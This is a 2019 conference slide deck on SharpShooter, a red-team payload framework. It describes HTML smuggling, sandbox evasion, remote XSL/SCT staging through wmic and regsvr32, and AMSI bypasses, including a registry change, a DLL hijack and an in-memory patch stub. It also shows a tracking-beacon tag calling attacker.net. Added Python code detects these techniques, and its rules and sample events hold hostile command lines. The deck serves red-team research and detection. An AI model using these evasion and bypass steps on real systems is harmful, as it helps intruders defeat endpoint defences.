Cracking the Perimeter with SharpShooter, Dominic Chell, June 2019 (PowerPoint presentation)

SLIDE 1

Cracking the Perimeter with SharpShooter

Dominic Chell June 2019

SLIDE 2
  • Dominic Chell:
    • Offensive Security @ MDSec
    • Responsible for *BEST, STAR and TIBER services
    • Twitter: @domchell
  • Projects:
    • SharpShooter
    • SharpPack
    • Chameleon
    • LyncSniper
    • PowerDNS

# whoami

SLIDE 3
  • Background
  • SharpShooter Overview
  • Reconnaissance
  • Delivery
  • Sandbox Evasion
  • Staging
  • “Free Styling” with SharpShooter
  • Exploring AMSI
  • Macro Support
  • Tradecraft
  • Detection / Prevention

OUTLINE

SLIDE 4
  • Establishing initial access can often be complex
  • Increased focus from defenders on PowerShell attacks
  • Easy to signature both statically and with process spawn chains
  • AMSI provides engines direct access to memory
  • Rise of sandboxing tech, “Next Gen Anti-Virus”, EDR and EDP
  • Increased difficulties introducing payloads to environments
  • Red teaming is getting harder!

BACKGROUND

SLIDE 5
  • Internally developed tool: SharpShooter
  • Successful on a number of adversary simulations
  • Some success in bypassing traditional and “Next Gen” security controls

OVERVIEW: SharpShooter

SLIDE 6

OVERVIEW: SharpShooter

SLIDE 7
  • Staged and stageless payload creation framework for Windows-based scripting file formats:
    • HTML Applications
    • JavaScript
    • VBScript
    • Windows Script Files
  • VBA and Excel4 Macro Support
  • Arbitrary execution of CSharp source
  • Anti-Sandboxing and HTML Smuggling

OVERVIEW: SharpShooter

SLIDE 8
  • Script payloads execute DotNet using DotNetToJScript
  • Staged payloads:
    • Arbitrary CSharp source code is retrieved via DNS or web
    • CSharp source code is compiled and executed using reflection

OVERVIEW: SharpShooter

SLIDE 9
  • Targeted reconnaissance provides a better chance of success
  • Payload should be targeted for the correct version of the DotNet framework
  • If executing in-process shellcode, it should correspond to the target’s architecture
  • Alternatively, an x86 process can be spawned and injected into

RECONNAISSANCE

SLIDE 10
  • Reconnaissance e-mail with image and system profiling links
  • Embed in e-mail:
      <img src="http://attacker.net/logo.png?uid=1234" />
  • Monitor web logs for results:
      Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.6366; ms-office; MSOffice 16)

RECONNAISSANCE

SLIDE 11
  • Delivery can leverage the “HTML smuggling” technique from @buffaloverflow
  • RC4 encrypted file decrypted in the browser using JavaScript’s WebCrypto APIs
  • navigator.msSaveBlob forces the browser to save the decrypted blob locally
  • Proxy sees text/html or attachment rather than the content type of the payload (e.g. text/vbscript)
  • SharpShooter provides two pre-defined template examples

DELIVERY

SLIDE 12
  • Attempts to avoid automated analysis, inspired by CheckPlease:
    • Domain keying
    • Domain member
    • Sandbox artefacts
    • Bad MACs
    • Debugging

SANDBOX EVASION

SLIDE 13
  • Obtaining Active Directory name example:

SANDBOX EVASION

SLIDE 14
  • Obtaining Active Directory name example:

SANDBOX EVASION

SLIDE 15

DEMO: PALO ALTO TRAPS

SLIDE 16
  • Shortly after release, signatures began to emerge
  • Defender AMSI signature detects all DotNetToJScript
  • Proclaimed dead by @subTee

DETECTION STATUS

SLIDE 17

DETECTION STATUS

SLIDE 18

DETECTION STATUS

SLIDE 19

SharpShooter RESURRECTION

SLIDE 20
  • Microsoft introduced AMSI in Windows 10
  • Standard interface to provide file, memory and stream scanning for any application
  • Analysis happens at the scripting engine, therefore with access to the plain, deobfuscated code
  • Supported in PowerShell, Windows Script Host (JavaScript and VBScript) and Office VBA macros

ANTIMALWARE SCAN INTERFACE

SLIDE 21

ANTIMALWARE SCAN INTERFACE

SLIDE 22

ANTIMALWARE SCAN INTERFACE

SLIDE 23
  • Mid-April 2018 @subTee released the “SquiblyTwo” attack
  • Script execution through stylesheets using wmic.exe
  • Defender AMSI did not trigger

ANTIMALWARE SCAN INTERFACE

SLIDE 24
  • Updates to SharpShooter to include “COM Staging” and XSL / SCT generation
  • Several known COM methods allow command execution:
    • Outlook.CreateObject
    • WScript.Run
    • Shellbrowserwindow.Document.Application.Run
    • WMI StartWin32Process
  • Leverage COM to execute wmic.exe or regsvr32.exe on the command line to perform “Squiblydoo” and “SquiblyTwo” attacks

COM STAGING

SLIDE 25

COM STAGING

HTA, JS, VBS -> COM Interface (Outlook, WScript, WMI etc) -> wmic.exe / regsvr32.exe -> Remotely Hosted XSL or SCT

SLIDE 26

FREE STYLING WITH SharpShooter

SLIDE 27
  • Research into COM objects supporting XSL processing identified the Microsoft.XMLDOM interface
  • Inline and remotely hosted transformation of XML against a given stylesheet, providing the following benefits:
    • No command line execution
    • Regsvr32.exe has known IOCs, e.g. User-Agent
    • XSL retrieval via HTTP/HTTPS
    • AMSI not supported in scriptlets; added early 2019
  • Later used by @bohops to bypass WDAC in CVE-2018-8492

FREE STYLING WITH SharpShooter

SLIDE 28

FREE STYLING WITH SharpShooter

SLIDE 29

DEMO: WINDOWS DEFENDER XSL

SLIDE 30
  • @Tal_Liberman discovered an AMSI bypass using the “AmsiEnable” registry key (HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable)
  • Requires the user to “open” the payload twice:
    • First pass checks the registry to determine if the key is set and, if not, sets it
    • Second pass opens the payload from the user’s download folder

AMSI BYPASSES

SLIDE 31

AMSI BYPASSES

SLIDE 32
  • @tiraniddo discovered a DLL hijacking vulnerability in AMSI
  • The technique prevents LoadLibrary from loading the AMSI.dll by convincing it that it’s already loaded
  • The scripting engine is unable to find the AMSI DLL exports and fails safe
  • Copy wscript.exe to a known location with the name amsi.dll and run the script file

AMSI BYPASSES

SLIDE 33
  • @Tal_Liberman discovered another bypass in AMSI by patching the amsi.dll’s exported functions
  • AmsiScanBuffer handles the buffer that is being scanned
  • Function patched in memory to return AMSI_RESULT_CLEAN
  • mov eax, 0x80070057; retn

AMSI BYPASSES
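As an added example (not from the talk and not part of SharpShooter), the Python below shows the defender-side integrity check that recognises the patch described on this slide. It decodes the first bytes of a captured AmsiScanBuffer prologue, flags a `mov eax, imm32 ; ret` stub (0x80070057 is the HRESULT E_INVALIDARG) and otherwise diffs the in-memory copy against a known-good baseline. Reading the live bytes out of a process and the baseline out of the on-disk amsi.dll is platform work left out here; the baseline prologue is a constructed stand-in, not the real amsi.dll bytes.

```python
import struct
from typing import Optional

# HRESULT returned by the patch on the slide: mov eax, 0x80070057 ; retn
E_INVALIDARG = 0x80070057
# x86/x64 encoding of that stub: B8 <imm32 little-endian> C3
PATCH_BYTES = b"\xb8" + struct.pack("<I", E_INVALIDARG) + b"\xc3"

# Constructed stand-in for an unpatched prologue (generic frame setup); a real
# check would take these bytes from the on-disk amsi.dll export instead.
BASELINE_PROLOGUE = bytes.fromhex("554889e54883ec20488b4d10")


def decode_mov_eax_ret(code: bytes) -> Optional[int]:
    """Return imm32 if the code starts with `mov eax, imm32 ; ret`, else None."""
    if len(code) >= 6 and code[0] == 0xB8 and code[5] == 0xC3:
        return struct.unpack("<I", code[1:5])[0]
    return None


def first_divergence(live: bytes, baseline: bytes) -> int:
    """Offset of the first byte where the in-memory copy differs from the baseline
    (compared over the shorter length), or -1 if they agree."""
    for offset, (a, b) in enumerate(zip(live, baseline)):
        if a != b:
            return offset
    return -1


def classify(live: bytes, baseline: bytes) -> str:
    """Label a captured prologue: the slide's stub, another mov/ret stub,
    an arbitrary modification, or unpatched."""
    imm = decode_mov_eax_ret(live)
    if imm == E_INVALIDARG:
        return "patched:mov-eax-E_INVALIDARG-ret"
    if imm is not None:
        return f"patched:mov-eax-0x{imm:08x}-ret"
    offset = first_divergence(live, baseline)
    return "unpatched" if offset == -1 else f"modified@{offset}"


if __name__ == "__main__":
    # Constructed captures: the stub overwriting the first six bytes, and a clean copy.
    patched = PATCH_BYTES + BASELINE_PROLOGUE[len(PATCH_BYTES):]
    print(classify(patched, BASELINE_PROLOGUE))
    print(classify(BASELINE_PROLOGUE, BASELINE_PROLOGUE))
```

The `first_divergence` path is the part worth keeping in a real tool: it catches any in-place edit of the exported function, not only the one stub shown on the slide, provided the baseline is taken from the same amsi.dll build that is loaded.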

SLIDE 34

DEMO: DEFENDER AMSI BYPASS

SLIDE 35
  • In Feb 2019, SharpShooter added additional support for VBA and Excel 4.0 macros
  • VBA support introduced using the XMLDOM and XSL technique
  • @StanHacked discovered a legacy feature of Office to execute macros using Excel 4.0
  • Excel 4.0 does not support AMSI and is not recognised by many EDR/EDP solutions
  • SharpShooter generates an SLK file to directly execute shellcode in Excel

MACRO SUPPORT

SLIDE 36

DEMO: MACRO EXECUTION

SLIDE 37
  • Default SharpShooter templates do not employ OpSec tradecraft; stageless template:
    • Allocates memory EXECUTE_READWRITE for shellcode execution
    • Executes shellcode “in process”, e.g. mshta.exe performing C2
    • Spawns from the default parent, e.g. wscript.exe launched from chrome.exe
  • Indicators discussed in detail by defenders:
    • https://countercept.com/blog/analyzing-sharpshooter-part-1/
    • https://countercept.com/blog/analyzing-sharpshooter-part-2/

TRADECRAFT

SLIDE 38
  • Reducing memory indicators is a trivial step:
    • Firstly allocate memory using PAGE_READWRITE
    • Reset the page permissions to PAGE_EXECUTE_READ using VirtualProtect

TRADECRAFT

SLIDE 39
  • Reducing process indicators can be achieved using injection:
    • Spawn an innocuous process, e.g. iexplore.exe
    • Inject shellcode using the chosen technique, e.g. ALPC, SetThreadContext, CreateRemoteThread etc.

TRADECRAFT

SLIDE 40
  • Parent PID spoofing can be performed using UpdateProcThreadAttribute
  • CreateProcess using the STARTUPINFOEX struct

TRADECRAFT

SLIDE 41

DEMO: TRADECRAFT

SLIDE 42
  • Staged mode CSharp compilation using CodeDom with the CompilerParameters.GenerateInMemory = true; parameter
  • Command line logging:
    • csc.exe invocation
    • nslookup.exe for DNS delivery
    • Modifications to the AmsiEnable registry key for AMSI bypasses

DETECTION
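The command-line and registry indicators on this slide, together with the COM staging chain on slide 25 (script host, then wmic.exe or regsvr32.exe, then a remotely hosted XSL or SCT), can be written as simple detection rules. The Python below is an added example, not part of the talk or of SharpShooter: it runs the rules over constructed Sysmon-style events (process creation and registry value set). Field names, paths, URLs and SIDs are placeholders of this example, not real IoCs.

```python
import re
from typing import Dict, List, Tuple

# Hosts in which script and macro payloads run; a child of one of these is the
# process-chain context the rules key on.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe",
                "winword.exe", "excel.exe", "outlook.exe"}

AMSIENABLE_SUFFIX = r"\software\microsoft\windows script\settings\amsienable"


def _image_name(path: str) -> str:
    """Reduce a Windows image path to its lower-case file name (works on any host OS)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_process_event(ev: Dict[str, str]) -> List[str]:
    """Rules over one process-creation event (Sysmon EID 1 / Security 4688 style fields)."""
    hits: List[str] = []
    parent = _image_name(ev.get("parent_image", ""))
    image = _image_name(ev.get("image", ""))
    cmd = ev.get("command_line", "").lower()
    from_script_host = parent in SCRIPT_HOSTS

    # Staged mode: CodeDom launches csc.exe even with GenerateInMemory = true,
    # so a compiler child of a script host is the staging indicator on slide 42.
    if image == "csc.exe" and from_script_host:
        hits.append("staged-csharp-compile")
    # DNS delivery of the CSharp source shells out to nslookup.exe.
    if image == "nslookup.exe" and from_script_host:
        hits.append("dns-staging-nslookup")
    # COM staging chain (slide 25): host -> wmic.exe / regsvr32.exe -> remote XSL / SCT.
    if image == "wmic.exe" and "/format:" in cmd and re.search(r"https?://", cmd):
        hits.append("squiblytwo-remote-xsl")
    if image == "regsvr32.exe" and "scrobj.dll" in cmd and "/i:" in cmd:
        hits.append("squiblydoo-remote-sct")
    return hits


def match_registry_event(ev: Dict[str, str]) -> List[str]:
    """Rule over one registry value-set event (Sysmon EID 13 style fields)."""
    target = ev.get("target_object", "").lower()
    if target.endswith(AMSIENABLE_SUFFIX):
        return ["amsienable-modified"]
    return []


def evaluate(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    findings: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        if ev.get("type") == "process":
            rules = match_process_event(ev)
        elif ev.get("type") == "registry":
            rules = match_registry_event(ev)
        else:
            rules = []
        findings.extend((idx, r) for r in rules)
    return findings


# Constructed sample telemetry (placeholder paths, hosts, URLs and SIDs).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\alice\Downloads\invoice.js"'},
    {"type": "process", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "command_line": r'csc.exe /noconfig /fullpaths @"C:\Users\alice\AppData\Local\Temp\abc.cmdline"'},
    {"type": "process", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\nslookup.exe",
     "command_line": "nslookup.exe -type=TXT stage.example.invalid"},
    {"type": "process", "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "command_line": 'wmic.exe os get /format:"http://example.invalid/stage.xsl"'},
    {"type": "process", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://example.invalid/stage.sct scrobj.dll"},
    {"type": "registry", "process": r"C:\Windows\System32\wscript.exe",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows Script\Settings\AmsiEnable",
     "details": "DWORD (0x00000000)"},
    # Benign compile: csc.exe under a build tool, not a script host.
    {"type": "process", "parent_image": r"C:\Program Files\dotnet\dotnet.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "command_line": "csc.exe /noconfig /nologo"},
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The csc.exe and nslookup.exe rules are deliberately constrained to a script-host parent, because both binaries are routine in build and administration activity. The AmsiEnable value lives in the user hive, so capturing the write needs registry auditing or a Sysmon configuration that includes that path.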

SLIDE 43
  • Endpoint prevention strategies:
    • Device Guard code integrity policy
    • Application whitelisting, block mshta.exe etc.
    • Modify default handlers for scripting extensions
  • Network:
    • Outbound DNS filtering
    • Monitor for HTML Smuggling, e.g. WebCrypto APIs

PREVENTION
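For the “monitor for HTML smuggling” item above and the delivery slide (slide 11: decryption in the browser via WebCrypto, navigator.msSaveBlob to force a save, the proxy seeing only text/html), the following Python is an added example, not from the talk or from SharpShooter: a scoring scanner that a proxy or mail gateway could run over a text/html body. The indicator names, weights and threshold are this example's own assumptions, and the sample page is constructed and is not a working payload.

```python
import re
from typing import Dict

# Indicator patterns (names constructed for this example).
INDICATORS = {
    "webcrypto-decrypt": re.compile(r"crypto\.subtle\.(?:decrypt|importKey|deriveKey)", re.I),
    "mssaveblob": re.compile(r"navigator\.msSave(?:OrOpen)?Blob", re.I),
    "blob-constructed": re.compile(r"new\s+Blob\s*\(", re.I),
    "object-url-download": re.compile(r"URL\.createObjectURL\s*\(|\.download\s*=", re.I),
    "base64-decode": re.compile(r"\batob\s*\(", re.I),
    # .js is left out on purpose: ordinary pages reference script files by name.
    "script-file-name": re.compile(r"['\"][^'\"]*\.(?:hta|vbs|wsf|sct|xsl)['\"]", re.I),
}

# Rough weights: decrypt-in-browser plus a forced save is the core of the technique.
WEIGHTS = {
    "webcrypto-decrypt": 3, "mssaveblob": 3, "object-url-download": 2,
    "script-file-name": 2, "embedded-base64-blob": 2,
    "blob-constructed": 1, "base64-decode": 1,
}


def find_indicators(html: str, min_blob_len: int = 256) -> Dict[str, int]:
    """Map each indicator seen to its match count (or, for the blob, its length)."""
    found: Dict[str, int] = {}
    for name, pat in INDICATORS.items():
        count = len(pat.findall(html))
        if count:
            found[name] = count
    # A long base64 literal is where the encrypted file rides inside the page.
    runs = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_blob_len, html)
    if runs:
        found["embedded-base64-blob"] = max(len(r) for r in runs)
    return found


def smuggling_score(html: str, min_blob_len: int = 256) -> int:
    return sum(WEIGHTS[name] for name in find_indicators(html, min_blob_len))


def is_suspicious(html: str, threshold: int = 6) -> bool:
    return smuggling_score(html) >= threshold


# Constructed sample of a smuggling-style page: the "ciphertext" is filler and
# the key and IV handling is omitted, so this is not a working payload.
SMUGGLED_HTML = """<html><body><script>
var payload = "%s";
var bytes = Uint8Array.from(atob(payload), function (c) { return c.charCodeAt(0); });
crypto.subtle.importKey("raw", keyBytes, "AES-CBC", false, ["decrypt"]).then(function (k) {
  return crypto.subtle.decrypt({name: "AES-CBC", iv: iv}, k, bytes);
}).then(function (plain) {
  var blob = new Blob([plain], {type: "application/octet-stream"});
  navigator.msSaveBlob(blob, "invoice.vbs");
});
</script></body></html>""" % ("A" * 300)

# Constructed benign page with a normal script include and download link.
BENIGN_HTML = """<html><head><script src="/static/app.js"></script></head>
<body><h1>Quarterly report</h1><a href="/reports/q1.pdf" download>Download PDF</a></body></html>"""

if __name__ == "__main__":
    for label, doc in (("smuggled", SMUGGLED_HTML), ("benign", BENIGN_HTML)):
        print(label, smuggling_score(doc), find_indicators(doc))
```

Run it on the decoded response body: the proxy sees text/html, which is exactly why a content-type filter alone misses the payload. The blob-length threshold and the weights should be tuned against the environment's own traffic before alerting on the score.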

SLIDE 44
  • Windows Scripting file formats provide a number of interesting opportunities for initial access
  • Leveraging COM, these can be harnessed for code execution using scriptlets and execution cradles
  • Creating weaponised tools raises ethical dilemmas, particularly when observed in the wild
  • Red team research/tooling can however provide a rare opportunity to raise the bar in detection at scale

CONCLUSIONS

SLIDE 45
  • SharpShooter available from https://github.com/mdsecactivebreach/SharpShooter
  • Thanks to the following people:
    • @tiraniddo: DotNetToJScript
    • @Arno0x0x: EmbedInHTML
    • @buffaloverflow: Demiguise
    • @arvanaghi and @ChrisTruncer: CheckPlease
    • @subTee: Squiblydoo/Two
    • @StanHacked: Excel4.0 research

REFERENCES

SLIDE 46

QUESTIONS